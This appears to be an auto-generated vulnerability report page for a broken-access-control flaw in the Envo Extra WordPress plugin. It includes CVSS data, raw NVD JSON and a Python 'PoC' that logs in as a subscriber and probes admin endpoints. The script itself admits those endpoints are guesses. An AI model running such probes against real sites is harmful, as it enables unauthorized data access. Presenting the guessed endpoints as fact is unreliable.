Security Vulnerability Report
中文
CVE-2026-32386 CVSS 4.3 MEDIUM

CVE-2026-32386

Published: 2026-03-13 19:54:54
Last Modified: 2026-04-29 10:17:04

Description

Missing Authorization vulnerability in EnvoThemes Envo Extra envo-extra allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Envo Extra: from n/a through <= 1.9.13.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Envo Extra <= 1.9.13 (all versions up to 1.9.13)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-32386 PoC - Envo Extra Broken Access Control # Target: WordPress site with Envo Extra plugin <= 1.9.13 import requests import sys target = "http://target-wordpress-site.com" # Authenticate as low-privilege user (subscriber) session = requests.Session() # Login as subscriber login_data = { 'log': 'subscriber_username', 'pwd': 'subscriber_password', 'wp-submit': 'Log In', 'testcookie': '1' } session.post(f"{target}/wp-login.php", data=login_data) # Exploit: Access admin-only functionality without proper authorization # Replace 'envo_extra_admin_action' with actual vulnerable endpoint # identified through plugin code review exploit_endpoints = [ "/wp-admin/admin-ajax.php?action=envo_extra_get_settings", "/wp-json/envo-extra/v1/settings", "/wp-admin/admin-ajax.php?action=envo_extra_export_data" ] for endpoint in exploit_endpoints: url = target + endpoint response = session.get(url) # Check if unauthorized access was successful if response.status_code == 200 and "error" not in response.text.lower(): print(f"[+] Vulnerable endpoint found: {endpoint}") print(f"[+] Response: {response.text[:500]}") else: print(f"[-] Endpoint not vulnerable: {endpoint}") print("\n[!] Note: Actual PoC requires identifying specific vulnerable AJAX/REST endpoints through source code analysis")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32386", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:53.910", "lastModified": "2026-04-29T10:17:03.807", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in EnvoThemes Envo Extra envo-extra allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Envo Extra: from n/a through <= 1.9.13."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en EnvoThemes Envo Extra envo-extra permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Envo Extra: desde n/a hasta &lt;= 1.9.13."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/envo-extra/vulnerability/wordpress-envo-extra-plugin-1-9-13-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}